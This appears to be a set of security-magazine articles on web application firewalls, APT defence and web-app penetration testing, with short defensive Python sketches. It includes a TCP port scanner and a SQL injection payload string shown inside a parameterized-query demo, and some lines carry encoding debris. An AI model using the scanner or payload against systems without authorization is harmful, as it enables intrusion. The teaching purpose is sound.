Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate such tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include, in particular, identity and access management. In this context the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or the use of the web application; all other privileges are blocked. General integration of the WAF with Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions are intuitive, clearly displayed, and easy to understand and to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface that is identical across several of the manufacturer's products, or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. Administrators can then rely on familiar settings processes for security clusters, ensuring that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (cum laude) in Computer Engineering from Santa Clara University.
ADVANCED PERSISTENT THREATS
deployed, with many more specifications relating to infrastructure.

Three steps are necessary to prevent or respond properly to an APT:
• Prevention
• Response
• Forensics
Prevention

Ideally, security should be addressed at the very beginning, when the software and even the application infrastructure are still at the conception stage. It is necessary to follow certain rules which will condition the response to different threats.
Define a Secure Application Infrastructure

Partition the Network

This measure is one of the pillars of PCI DSS, and for good reason. Keeping sections separate can limit the impact of an intrusion, making it more difficult for an attacker to reach their goal because of the large number of bounces required to attain sensitive data. Each zone also deploys a security policy adapted to its content, whether the flow is inbound or outbound.
Moreover, partitioning allows for easier forensic analysis in case of a compromise. It is easier to understand the steps and measure the impact and depth of the attack when one is able to analyze each area separately. Unfortunately, there are many systems, described as flat infrastructures, that house a variety of applications in the same area. After an incident has occurred, it is difficult to determine precisely which applications have been compromised and what data has been hijacked.
Separation of Applications

Applications can be separated using criteria such as data categorization or the level of risk attached to the application. Clustering provides numerous advantages:
• It promotes rationalization in the design of security policies, which are more or less complex depending on the type of data and the structure of the application to secure.
• It enhances understanding of an attack, and by doing so facilitates the search for evidence, which will then be based on the criticality of data and the complexity of applications.
Anticipate Possible Outcomes

To better understand the scope of an attack, it is necessary to anticipate the options available to a hacker once an application has been compromised. Once this is done, it is necessary to anticipate the procedures required to analyze, verify and understand the attack. We should bear in mind that an area of the infrastructure in which it is impossible to install a monitoring tool will be very complex to analyze during an incident. In such a case, it is necessary to predefine the tools and procedures for investigation and/or monitoring.
Risk Analysis and Attack Guidelines

This step allows a precise understanding of risks, based on the data manipulated by applications. It has to be carried out by studying web applications, their operation and their business logic. Once each data component has been identified, it is possible to draw up a list of rules and regulations that need to be followed by the application infrastructure.
Developer Training

Applications are commonly developed following specific business imperatives, often with the added stress of meeting availability deadlines. Developers do not place security high on their list of priorities, and it is often overlooked in the process. However, there are several ways to significantly reduce risk:
• Raising developer awareness of application attacks:
  • OWASP Top 10
  • WASC TC v2
• The use of libraries to filter input (libraries are available for all languages)
• Setting up audit functions, logs and traceability
• Accurate analysis of how the application works
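To illustrate the input-filtering point, here is a minimal sketch of the two complementary techniques such libraries provide: whitelist validation of input and output encoding. The username pattern is an invented example; real projects should prefer a maintained filtering library over hand-rolled checks.

```python
import html
import re

# Illustrative input-filtering helpers of the kind dedicated libraries
# provide. The allowed character set below is an assumption for the example.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{3,32}$")

def validate_username(value):
    """Whitelist validation: accept only a safe character set and length."""
    return bool(USERNAME_RE.match(value))

def encode_for_html(value):
    """Output encoding: neutralize markup before echoing user input."""
    return html.escape(value, quote=True)
```

Validation rejects malformed input at the boundary; encoding ensures that whatever is stored cannot execute when rendered.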
Regular Auditing: Code Analysis

You can resort to manual code analysis by an auditor, or to automated analysis using the tools available to find vulnerabilities in the source code of web applications. These tools often require complex configuration. This step is useful for detecting vulnerabilities before going into production, and thus fixing them before they are exploited. Unfortunately, this practice is only possible if you have access to the source code of the application; closed-source software packages cannot be analyzed.
Scanning and Penetration Testing

All applications can be scanned and pentested. These tests also require configuration and/or a thorough analysis of the application, to determine the credentials necessary for navigation, or the resources to be avoided because of their capacity to cause significant damage (e.g. links enabling the deletion of entries in the database).
These tests have to be repeated as often as possible, and whenever a change to the application is put in place by developers.
Appropriate Response

Traditional firewalls do not filter application protocols; at best, the so-called next-generation models can recognize a type of protocol and filter content in the manner of an IPS, by recognizing attack patterns. This response is clearly inadequate.
Each zone containing web applications has to be filtered on incoming and outgoing content, and on the use of the protocol itself.
This type of deployment is often called defense in depth, and has the ability to monitor the various attacks at both the application and network levels.
Last but not least, associating the identity context with the security policy allows better detection of anomalies.
Traffic Filtering: The WAF (Web Application Firewall)

Web application firewalls can be considered an extension of network firewalls to the application layer: they are able to analyze HTTP and the content it conveys. The device is strongly recommended by section 6.6 of PCI DSS.
Often used in reverse proxy mode, it allows for a break in protocol and facilitates the restructuring of zones between applications.
The WAFEC document (Web Application Firewall Evaluation Criteria), published by WASC, is a useful guideline that helps to understand and evaluate different vendors as needed.
The WAF also helps to monitor and alert in case of threat, in order to trigger a rapid response (e.g. blocking the IP of the attacker via a dialogue protocol with network firewalls).
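A minimal sketch of that rapid-response loop, under the assumption of an invented detection threshold: once a source IP accumulates enough attack detections, it goes onto a block list that a network firewall could consume.

```python
from collections import Counter

# Hypothetical sketch of WAF-style rapid response: repeated attack
# detections from one source IP lead to an automatic block. The
# threshold value is an invented example.
BLOCK_THRESHOLD = 5

class AttackResponder:
    def __init__(self):
        self.detections = Counter()
        self.blocked = set()

    def on_attack_detected(self, source_ip):
        """Record a detection and block the IP once the threshold is hit."""
        self.detections[source_ip] += 1
        if self.detections[source_ip] >= BLOCK_THRESHOLD:
            self.blocked.add(source_ip)

    def is_blocked(self, source_ip):
        return source_ip in self.blocked
```

In a real deployment the `blocked` set would be pushed to the network firewall via whatever dialogue protocol the two devices share.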
Traffic Filtering: The WSF (Web Services Firewall)

The WSF is an extension of the WAF for the protocols carrying XML traffic over HTTP, such as SOAP or REST.
XML and its standards make security management easier, in the sense that the operation of the service is described by documents generated directly by the development framework (e.g. WSDL, schemas).
Web services are vulnerable to the same attacks as web applications; they consequently need the same kind of protection. Their position in the application infrastructure, however, is much more critical: they are often located at the heart of sensitive information zones and connected directly via private links to partner infrastructures.
The WSF provides security on the message format and content, but also on the use of a service. The use or production of a web service entails a contract between two parties on the type of use (e.g. number of messages per day, data type, etc.). The WSF also serves to monitor this function and to ensure respect of the SLA between the two parties.
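The messages-per-day aspect of such a contract can be sketched as a simple per-consumer daily quota check; the consumer names and quota are invented for the example.

```python
import time

# Hypothetical sketch of WSF-style SLA enforcement on a web service
# contract: a maximum number of messages per day per consumer.
class ServiceContract:
    def __init__(self, max_messages_per_day):
        self.max_messages = max_messages_per_day
        self.counts = {}  # (consumer, day) -> message count

    def accept(self, consumer, day=None):
        """Return True if the consumer is still within its daily quota."""
        day = day if day is not None else time.strftime("%Y-%m-%d")
        key = (consumer, day)
        self.counts[key] = self.counts.get(key, 0) + 1
        return self.counts[key] <= self.max_messages
```

A production WSF would additionally validate message format and content against the service's WSDL/schema before counting the message.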
Authentication and Authorization

Applications use identities to control access to various resources and functions.
Associating the identity context with security increases efficiency in the detection of anomalies. For example, a whitelist adapted according to the type of user can verify access to information based on the user's role.
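A minimal sketch of such a role-adapted whitelist, with invented roles and resource paths: any request outside the expected set for the user's role is flagged as an anomaly.

```python
# Hypothetical sketch of associating identity context with security policy:
# each role gets its own whitelist of resources. Roles and paths are invented.
ROLE_WHITELIST = {
    "customer": {"/catalog", "/cart", "/orders"},
    "support":  {"/catalog", "/tickets"},
    "admin":    {"/catalog", "/cart", "/orders", "/tickets", "/admin"},
}

def is_anomalous(role, resource):
    """Flag access that falls outside the whitelist for the user's role."""
    return resource not in ROLE_WHITELIST.get(role, set())
```

An unknown role gets an empty whitelist, so everything it touches is flagged, which fails safe.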
Ensuring Continuity of Service

Application security is primarily concerned with the exploitation of vulnerabilities in order to divert normal use for malicious purposes. However, some attacks based on weaknesses can be devastating in effect, perpetrated to make the application unavailable and thereby provoke losses due to activity downtime.
To counter this, it is necessary to establish protective measures that block denial of service and automated processes, and to ensure load balancing and SSL acceleration.
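One common measure against automated processes is per-client rate limiting; here is a minimal sliding-window sketch, with the window and limit chosen arbitrarily for the example.

```python
import time

# Hypothetical sketch of a protective measure against automated traffic:
# a sliding-window rate limiter per client. Window and limit are invented.
class RateLimiter:
    def __init__(self, max_requests, window_seconds):
        self.max_requests = max_requests
        self.window = window_seconds
        self.history = {}  # client -> list of recent request timestamps

    def allow(self, client, now=None):
        """Return True if the client is within its rate budget."""
        now = now if now is not None else time.time()
        # Keep only timestamps that fall inside the current window.
        recent = [t for t in self.history.get(client, []) if now - t < self.window]
        recent.append(now)
        self.history[client] = recent
        return len(recent) <= self.max_requests
```

The `now` parameter exists so the limiter can be tested deterministically; in production it defaults to the wall clock.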
Operation

Monitoring

It is important to understand the use of the application in production, to monitor and detect abnormal behavior, and to make decisions accordingly:
• Blacklisting
• Legal action
• Redirection to a honeypot
Log Correlation

Understanding abnormal behavior in an application helps in locating an attack. An application infrastructure can comprise hundreds of applications. To understand the attack as a whole and monitor its phases (discovery, aggression, compromise), it is necessary to have a holistic view.
To do this, it is imperative to confront and correlate logs to obtain a real-time overall analysis and understand the threat mechanics:
• Mass attack on a type of application
• Attack targeting a specific application
• Attacks focused on a type of data
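The three patterns above can be surfaced by grouping attack events along different axes; the event fields below are an invented format for illustration.

```python
from collections import Counter

# Hypothetical sketch of log correlation across many applications:
# group attack events to surface the three patterns above.
# The event dictionary format ('app', 'app_type', 'data_type') is invented.
def correlate(events):
    """events: list of dicts with 'app', 'app_type' and 'data_type' keys."""
    return {
        "by_app_type": Counter(e["app_type"] for e in events),    # mass attack on a type of application
        "by_app": Counter(e["app"] for e in events),              # attack targeting a specific application
        "by_data_type": Counter(e["data_type"] for e in events),  # attacks focused on a type of data
    }
```

A real SIEM would add time windows and source correlation, but the grouping idea is the same.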
Reporting and Alerting

The dialogue between application, network and security teams is often complex within an organization. Formalized reports on attacks and on the use of the application provide these teams with a basis for work and an understanding of application threats.
Alerts will enable them to react and trigger procedures, either at the network level by blocking the IP of the attacker, or at the application level by forbidding access to resources or areas, or more directly by referral to a honeypot with a view to analyzing the behavior of the attacker.
Forensics

Understanding the Scope of an Attack

For each area compromised, it is important to understand which elements have been impacted, and to trace the attack back to the roots of the intrusion and compromise: the installation of a backdoor, bounce mechanisms to other areas, and/or extraction of data.
Analysis of Application Components

To understand how the intrusion occurred, it is important to look for abnormal uses. One example could be the presence of anomalous data in a variable or a cookie. To drill down to this level, the logs of the various application components turn out to be very useful:
• Web server or application
• Database
• Directory
• Etc.
Systems Analysis

To understand how the attacker remained in the area, it is important to identify the type of backdoor used. From the simplest act, such as placing an executable file in the application itself, to the injection of code into a process (e.g. hooking network functions), it is necessary to analyze the system hosting the application for:
• Changed configuration files
• Users added
• Security rules changed
• Errors of execution or privilege escalation
• Unknown daemons or unusual groups and users
• Etc.
Analysis of Network Equipment

During the various bounces within the application infrastructure, the discovery and exploration of new possibilities leave fingerprints. Network firewalls keep precious logs with traces of these attempts. In addition, if access is logged, it is important to check whether there are connections to web applications at unusual times.
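The unusual-time check can be sketched as a simple filter over access-log entries; the log format and the definition of "usual" hours below are assumptions for the example.

```python
# Hypothetical sketch of the forensic check described above: flag logged
# connections to web applications outside business hours. The log-entry
# format and the hour range are invented assumptions.
BUSINESS_HOURS = range(8, 20)  # 08:00-19:59 counts as usual

def unusual_accesses(log_entries):
    """log_entries: list of (hour_of_day, source_ip); return flagged entries."""
    return [(hour, ip) for hour, ip in log_entries if hour not in BUSINESS_HOURS]
```

In practice the baseline of "usual" would be derived per application from historical traffic rather than a fixed range.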
The End Justifies the Means

In conclusion, we can see that the means used to achieve an APT are often substantial and proportional to the criticality of the targeted data. APTs are not just temporary attacks but real and constant threats, with latent effects, that need to be fought in the long run.
The security of an application infrastructure begins with the conception process, and requires basic rules to be respected in order to simplify security operations.
Real-life experience of application management highlights the difficulties in implementing all of these good practices.
A comprehensive study of threats, an appropriate response, and the anticipation of possible incidents are now the recommended procedure for dealing with application attacks.
MATTHIEU ESTRADE
Matthieu Estrade has 14 years of experience in internet security. In 2001, Matthieu designed a pioneering application firewall based on web reverse proxy technology for the company Axiliance. As a well-known specialist in his field, he soon became a member of the open source Apache HTTP Server development team. His security expertise has been put to use in WASC (Web Application Security Consortium) projects like WAFEC and WASSEC. Matthieu is also a member of the French OWASP chapter. Matthieu is currently CTO at BeeWare.
WEB APP SECURITY
Dynamic web applications usually use technologies such as ASP, ASP.NET, PHP, Ajax, JSP, Perl, ColdFusion, and Flash.
These applications expose financial data, customer information, and other sensitive and confidential data that require authentication and authorization. Ensuring that web applications are secure is a critical mission that businesses have to undertake to achieve the desired security level for such applications. With the accessibility of such critical data from the public domain, web application security testing also becomes a paramount process for all web applications that are exposed to the outside world.
Introduction

Penetration testing (also called pen testing) is usually conducted by ethical hackers, where the security team reviews application security vulnerabilities to discover potential security risks. This process requires deep knowledge and experience in a variety of different tools and a range of exploits that can achieve the required tasks.
During pen testing, different web application vulnerabilities are tested (e.g. input validation, buffer overflow, cross-site scripting, URL manipulation, SQL injection, cookie modification, bypassing authentication, and code execution). A typical pen test involves the following procedures:
• Identification of ports: ports are scanned and the associated running services are identified.
• Software services analyzed: both automated and manual testing is conducted to discover weaknesses.
• Verification of vulnerabilities: this process helps verify that the vulnerabilities are real and that the weaknesses might be exploited, in order to help remediate the issues.
• Remediation of vulnerabilities: the vulnerabilities are resolved and then re-tested to ensure they have been addressed.
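The port-identification step can be sketched as a plain TCP connect scan; the port-to-service mapping below is an assumption (services are guessed from conventional port numbers, not verified). Only run this against hosts you are authorized to test.

```python
import socket

# Hypothetical sketch of the port-identification step: a TCP connect scan
# against a handful of common ports. The service names are conventional
# guesses, not confirmed banners.
COMMON_PORTS = {80: "http", 443: "https", 22: "ssh", 3306: "mysql"}

def scan_ports(host, ports=COMMON_PORTS, timeout=0.5):
    """Return a dict of open port -> guessed service name."""
    open_ports = {}
    for port, service in ports.items():
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means the connect succeeded
                open_ports[port] = service
    return open_ports
```

A real engagement would use a dedicated scanner (and banner grabbing) rather than guessing services from port numbers.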
Part of the initiative of securing web applications is to include a security development lifecycle as part of the software development lifecycle, where the number of security-related design and coding defects can be reduced, and the severity of any defects that do remain undetected can be reduced or eliminated. Although these initiatives solve some of the security problems, some undiscovered defects will remain even in the most scrutinized web applications. Until scanners can harness true artificial intelligence, and put anomalies into context or make normative judgments about them, the struggle to find certain vulnerabilities will continue.
Web Application Security and Penetration Testing

In recent years, web applications have grown dramatically within many organizations and businesses, and such entities have become very dependent on this technology as part of their business lifecycle.
Automated Scanning vs. Manual Penetration Testing

A vulnerability assessment simply identifies and reports vulnerabilities, whereas a pen test attempts to exploit vulnerabilities to determine whether unauthorized access or other malicious activities are possible. By performing a pen test to simulate an attack, it is possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration, hardware or software flaws, or weaknesses in the perimeter defences protecting the application.
With more than 75% of attacks occurring over the HTTP/HTTPS protocols, and more than 90% of web applications containing some type of security vulnerability, it is essential that organizations implement strong measures to secure their web applications. Most of these attacks occur at the front door of the organization, where the entire online community has access (i.e. port 80 and port 443). With the complexity and the tremendous amount of sensitive data that exist within web applications, consumers not only expect but also demand security for this information.
That said, securing a web application goes far beyond testing the application using automated systems and tools, or using manual processes. The security implementation begins in the conceptual phase, with the modeling of the security risk introduced by the application and the countermeasures that are required to be implemented. Web application security should be thought of as another quality vector of every application that has to be considered through every step of the application lifecycle.
Discovering web application vulnerabilities can be performed through different processes:

• Automated process: scanning tools or static analysis tools are used.
• Manual process: penetration testing or code review is used.
Web application vulnerability types can be grouped into two categories.
Technical Vulnerabilities

These vulnerabilities can be examined through tests such as cross-site scripting, injection flaws, and buffer overflow. Automated systems and tools which analyze and test web applications are much better equipped to test for technical vulnerabilities than manual penetration tests. While automated testing and scanning tools may not be able to address 100% of all technical vulnerabilities, there is no reason to believe that such tools will achieve that goal in the near future. Current problems facing web application tools include the following: client-side generated URLs, required JavaScript functions, application logout, transaction-based systems requiring specific user paths, automated form submission, one-time passwords, and infinite web sites with random URL-based session IDs.
Logical Vulnerabilities

These vulnerabilities can manipulate the logic of the application to perform tasks that were never intended. While both an automated scanning tool and a skilled penetration tester can navigate through a web application, only the latter is able to understand the logic behind a specific workflow, or how the application works in general. Understanding the logic and flow of an application allows the manual pen tester to subvert the business logic and expose security vulnerabilities. For instance, an application might direct the user from point A to point B to point C based on the logic flow implemented within the application, where point B represents a security validation check. A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C, bypassing the security validation that exists at point B.
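The A-to-C bypass described above can be probed with a simple forced-browsing check: request point C directly, skipping point B, and see whether the application serves it. The path and the `fetch` callable are invented stand-ins for whatever HTTP client the tester uses.

```python
# Hypothetical sketch of probing the A -> B -> C logic flaw described above.
# 'fetch' is an invented stand-in for an HTTP client: fetch(path) -> status code.
def check_flow_bypass(fetch, validated_path="/checkout/confirm"):
    """Jump straight to point C; a 200 without passing point B is a finding."""
    status = fetch(validated_path)
    return {
        "path": validated_path,
        "status": status,
        "bypass_suspected": status == 200,  # should have been redirected or denied
    }
```

A correctly implemented flow would respond with a redirect (e.g. 302 back to the validation step) or a 403 when point B has not been completed.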
History has proven that software bugs, defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities, which can lead to unauthorized access to systems, networks, and application information. It is also proven that most security breaches occur due to vulnerabilities within the web application layer (i.e. attacks using the HTTP/HTTPS protocol). Against such attacks, traditional security mechanisms such as firewalls and IDS provide little or no protection.
Security analyses review the critical components of a web-based portal, e-commerce application, or web services platform. Part of the analysis work is to identify vulnerabilities inherent in the code of the web application itself, regardless of the technology implemented, the back-end database, or the web server used by the application.
It is imperative to point out that web application penetration assessments should be designed based upon a defined threat model. They should also be based upon the evaluation of the integration between components (e.g. third-party components and in-house built components) and the overall deployment configuration, which represents a solid choice for establishing a baseline security assessment. Application penetration assessments serve as a cost-effective mechanism to identify a set of vulnerabilities in a given application, exposing the vulnerabilities most likely to be exploited and allowing similar instances of vulnerabilities to be found throughout the code.

Figure 1: The different activities of the Pen Testing processes
How Web Application Pen Testing Works

Most web application penetration testing is carried out from security operations centers, where the resources under test are accessed remotely over the Internet using different penetration technologies. At the end of such a test, the application penetration test provides a comprehensive security assessment for various types of applications (e.g. commercial enterprise web applications, internally developed applications, web-based portals, and e-commerce applications). Figure 1 describes some of the activities that usually happen during the pen testing process. Testing processes used to achieve the security vulnerability assessment include application spidering, authentication testing, session management testing, data validation testing, web service testing, Ajax testing, business logic testing, risk assessment, and reporting.
In conducting web penetration testing, different approaches can be used to achieve the security vulnerability assessment; some of these approaches are:

• Zero-Knowledge Test (Black Box): the application security testing team does not have any inside information about the target environment, and the expected knowledge gain is based on information that can be found in the public domain. This type of test is designed to provide the most realistic penetration test possible, since in many cases attackers start with no real knowledge of the target systems.
• Partial Knowledge Test (Gray Box): partial knowledge about the environment under testing is gained before conducting the test.
• Source Code Analysis (White Box): the penetration test team has full information about the application and its source code. In such a test, the security team does a line-by-line code review in an attempt to find any flaws that could allow attackers to take control of the application, perform a denial of service attack against it, or use such flaws to gain access to the internal network.
It is also important to point out that penetration testing can be conducted as two different types of testing:

• External penetration testing
• Internal penetration testing

Both types can be conducted with minimal information (black box) or with fuller information (white box).
Figure 2: The different phases of the Pen Testing process
Figure 3 shows the different procedures and steps that can be used to conduct penetration testing. The following is a description of these steps:
bull Scope and Plan ndash In this step the scope of the penetration testing is identified and the project plan and resources will be defined
bull System Scan and Probe ndash In this step the system scanning under the defined scope of the project will be conducted where the automated scanners will examine the open ports scanning the system to detect vulnerabilities and hostnames and IP addresses previously collected will be used at this stage
bull Creating of Attack Strategies ndash In this step the testers prioritize the systems and the attack methods will be used based on the type of the system and how critical these systems Also in this stage the penetration testing tools will be selected based on the vulnerabilities detected from the previous phase
• Penetration Testing – In this step vulnerabilities are exploited using the automated tools, and the attack methods designed in the previous phase are used to conduct the following tests: data and service pilferage, buffer overflow, privilege escalation, and denial of service (if applicable).
• Documentation – In this step all the vulnerabilities discovered during the test are documented; evidence of exploitation and the penetration testing findings are also recommended to be presented later within the final report.
• Improvement – The final step of the penetration test is to provide corrective actions for closing the discovered vulnerabilities within the systems and the web applications.
Web Application Testing Tools
Throughout the pen test, a specific structured methodology has to be followed, with the following steps: Enumeration, Vulnerability Assessment, and Exploitation. Some of the tools that might be used within these steps are:
• Port Scanners
• Sniffers
• Proxy Servers
• Site Crawlers
• Manual Inspection
The output from the above tools allows the security team to gather information about the environment, such as open ports, services, versions, and operating systems. The vulnerability assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s), application server(s), database server(s), and any intermediary devices such as firewalls and load balancers. It's also important for the security team not to rely solely on tools during the assessment phase to discover vulnerabilities; manual inspection of items such as HTTP responses, hidden fields, and HTML page sources should be part of the security assessment as well.
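As a small illustration of the manual-inspection point above, the hidden fields in a returned page can be pulled out programmatically for review. A minimal Python sketch; the HTML sample is invented for illustration:

```python
# Sketch: extract hidden form fields from an HTML page for manual review.
# The HTML sample here is illustrative, not from a real application.
from html.parser import HTMLParser

class HiddenFieldFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hidden = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type") == "hidden":
            self.hidden[a.get("name")] = a.get("value")

page = ('<form><input type="hidden" name="price" value="10.00">'
        '<input type="text" name="qty"></form>')
finder = HiddenFieldFinder()
finder.feed(page)
# Hidden fields are prime tampering candidates for a tester to inspect
print(finder.hidden)
```

A field like `price` carried in a hidden input is exactly the kind of value a tester would try to manipulate through a proxy.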
Some of the areas that can be covered during the vulnerability assessment are the following:
• Input validation
• Access Control
Figure 3. Testing techniques, procedures and steps
• Authentication and Session Management (Session ID flaws) vulnerabilities
• Cross Site Scripting (XSS) vulnerabilities
• Buffer Overflows
• Injection Flaws
• Error Handling
• Insecure Storage
• Denial of Service (if required)
• Configuration Management
• Business logic flaws
• SQL Injection faults
• Cookie manipulation and poisoning
• Privilege escalation
• Command injection
• Client side and header manipulation
• Unintended information disclosure
During the assessment, testing of the above vulnerabilities is performed, except for those that could cause a denial of service condition; these are usually discussed beforehand. Possible options for denial of service testing include testing during a specific time window, testing a development system, or manually verifying the condition that may be responsible for the vulnerability. Once the vulnerability assessment is complete, the final reports, recommendations, and comments are summarized, and better solutions are suggested for the implementation process. At this point the penetration test is only half done: the most important part of the assessment still has to be delivered, which is the informative report that highlights all the risks found during the penetration phase.
The following are some of the commonly used tools for traditional penetration testing.
Port Scanners
Such tools are used to gather information about which network services are available for connection on each target host. A port scanning tool usually examines or questions each of the designated network ports or services on the target system. Most of these tools are able to scan both TCP and UDP ports. Another common feature of port scanners is their ability to determine the operating system type and its version number, since protocol implementations such as TCP/IP can vary in their specific responses. Configuration flexibility in port scanners serves to examine different port configurations, as well as to hide from network intrusion detection mechanisms.
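The basic technique these tools build on can be sketched in a few lines. A minimal TCP connect() scanner in Python; the host and port range are illustrative, and of course you should only scan systems you are authorized to test:

```python
# Sketch: a minimal TCP connect() port scanner, the basic technique
# port-scanning tools build on. Host and port range are illustrative;
# scan nothing you are not authorized to test.
import socket

def scan(host, ports, timeout=0.5):
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 when the TCP handshake succeeds
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports

print(scan("127.0.0.1", range(1, 25)))
```

Real scanners add UDP probes, timing tricks to evade intrusion detection, and banner or stack fingerprinting on top of this core loop.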
Vulnerability Scanners
While port scanners only produce an inventory of the types of available services, vulnerability scanners attempt to exercise vulnerabilities on their targeted systems. The main goal of vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts. These scanners work from a database of documented network service security defects, exercising each defect on each available service of the target hosts. Most commercial and open source scanners scan the operating system for known weaknesses and unpatched software, as well as configuration problems such as user permission management defects or problems with file access controls. Despite the fact that both network-based and host-based vulnerability scanners do little to help with a web application-level penetration test, they are fundamental tools for any penetration testing. Good examples of such tools are Internet Scanner, QualysGuard, and Core Impact.
Application Scanners
Most application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against it. Popular commercial application scanners include AppScan and WebInspect.
Web Application Assessment Proxies
Assessment proxies work by interposing themselves between the web browser used by the testers and the target web server, where data can be viewed and manipulated. Such flexibility enables different tricks to exercise the application's weaknesses and those of its associated components. For example, penetration testers can view all cookies, hidden HTML fields, and other data used by the web application and attempt to manipulate their values to trick the application.
The above penetration testing practice is called black box testing. Some organizations use hybrid approaches, where traditional penetration testing is combined with some level of source code analysis of the web application. Most penetration testing tools can perform these penetration testing practices; however, choosing the right tool for the job is vital for the success of the penetration process and the accuracy of the results.
The following are some of the common features that should be implemented within penetration testing tools:
• Visibility – The tool must provide the required visibility for the testing team, which can be used for the feedback and reporting of the test results
• Extensibility – The tool can be customized, and it must provide scripting language or plug-in capabilities that can be used to construct customized penetration tests
• Configurability – A tool that is configurable is highly recommended, to ensure the flexibility of the implementation process
• Documentation – The tool should provide the right documentation, giving a clear explanation of the probes performed during the penetration test
• License Flexibility – A tool that has flexibility of use, without specific constraints such as a particular IP range or license limits, is better than others
Security Techniques for Web Apps
Some of the security techniques that can be implemented within a web application to eliminate vulnerabilities are:
• Sanitize the data coming from the browser – Any data that is sent by the browser can never be trusted (e.g. submitted form data, uploaded files, cookie data, XML, etc.). If web developers fail to sanitize the incoming data, it might lead to vulnerabilities such as SQL injection, cross site scripting, and other attacks against the web application.
• Validate data before form submission and manage sessions – Cross Site Request Forgery (CSRF) can occur when a web application accepts form submission data without verifying that it came from the user's web form. It is imperative for the web application to verify that the submitted form is one that the web application itself produced and served.
• Configure the server in the best possible way – Network administrators have to follow guidelines for hardening web servers. Some of these guidelines are: maintain and update proper security patches, kill all redundant services and shut down unnecessary ports, confine access rights to folders and files, employ SSH (the Secure Shell network protocol) rather than telnet or FTP, and install efficient anti-malware software.
In addition to the above guidelines, it is always important to enforce strong passwords for web application users and to protect any stored passwords.
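To make the first guideline concrete: the standard defence against SQL injection is to keep user input out of the query text with parameterized queries. A minimal Python/sqlite3 sketch, with a table and payload invented for illustration:

```python
# Sketch: parameterized queries neutralize SQL injection by keeping
# user input out of the query text. Table and input are illustrative.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cr3t')")

user_input = "alice' OR '1'='1"  # classic injection attempt

# Building the query by string concatenation would return every row;
# the placeholder form treats the whole input as a single literal value.
rows = conn.execute("SELECT secret FROM users WHERE name = ?",
                    (user_input,)).fetchall()
print(rows)  # [] -- the injection payload matches no user
```

The same placeholder discipline applies to any database driver; escaping by hand is far more error-prone.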
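The form-verification guideline above is commonly implemented with a per-session anti-CSRF token. A minimal sketch, assuming an HMAC over a session identifier; the secret and session id are illustrative, not a prescribed scheme:

```python
# Sketch: issue and verify a per-session CSRF token, one common way to
# check that a form submission originated from a page the application
# itself served. Secret key and session id are illustrative.
import hmac
import hashlib
import secrets

SECRET_KEY = secrets.token_bytes(32)  # kept server-side only

def issue_token(session_id: str) -> str:
    # Embedded in the form the application serves to the user
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def verify_token(session_id: str, token: str) -> bool:
    # Constant-time comparison avoids timing side channels
    return hmac.compare_digest(issue_token(session_id), token)

token = issue_token("session-42")
print(verify_token("session-42", token))    # True
print(verify_token("session-42", "forged")) # False
```

A submission arriving without the token the server issued for that session is rejected, which is exactly the origin check the guideline calls for.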
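As for protecting stored passwords, one common approach is salted, iterated hashing rather than recoverable storage. A hedged sketch using PBKDF2 from the standard library; the iteration count is illustrative:

```python
# Sketch: store passwords as salted PBKDF2 hashes instead of plaintext.
# The iteration count is illustrative; tune it for your hardware.
import hashlib
import hmac
import os

def hash_password(password: str, salt: bytes = None):
    salt = salt or os.urandom(16)  # unique salt defeats rainbow tables
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest

def check_password(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return hmac.compare_digest(candidate, digest)

salt, digest = hash_password("correct horse battery staple")
print(check_password("correct horse battery staple", salt, digest))  # True
print(check_password("guess", salt, digest))                         # False
```

If the user table leaks, the attacker gets salts and slow hashes rather than credentials.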
Conclusion
A vulnerability assessment is the process of identifying, prioritizing, quantifying, and ranking the vulnerabilities in a system; such a process determines whether there are weaknesses or vulnerabilities in the system subjected to the assessment. Penetration testing includes all of the processes in a vulnerability assessment, plus the exploitation of the vulnerabilities found in the discovery phase.
